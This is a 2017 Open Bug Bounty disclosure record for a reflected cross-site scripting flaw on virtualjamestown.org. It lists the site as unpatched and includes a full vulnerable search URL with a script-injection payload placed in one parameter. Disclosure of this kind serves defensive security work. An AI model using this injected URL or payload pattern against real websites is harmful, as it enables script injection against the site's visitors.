virtualjamestown.org XSS vulnerability

2017-06-19T15:13:00
ID OBB:250086
Type openbugbounty
Reporter xssbuddy
Modified 2017-06-26T16:14:00

Description

Vulnerable URL:
http://www.virtualjamestown.org/indentures/search_indentures.cgi?search_type=basic&start;_page=0&db;=bristol_ind&servant;_ln=1%22%27--!%3E%3Cscript%3Ealert('OPENBUGBOUNTY')%3C/script%3E&servant;_fn=&servant;_place=&servant;_occ=&destination;=&ship;=&year-ops;=&year;=&year1;=&agent;_ln=Davis&agent;_fn=Thomas&agent;_place=&agent;_occ=planter&result;_order=&submit;=Initiate%20Search#
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 29.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1258670
VIP website status:| No
Check virtualjamestown.org SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 19 June, 2017 15:13 GMT
Generic security notifications sent to website owner| 19 June, 2017 15:15 GMT
Notification sent to subscribers (without technical details)| 19 June, 2017 18:17 GMT
Vulnerability details disclosed by researcher| 26 June, 2017 16:14 GMT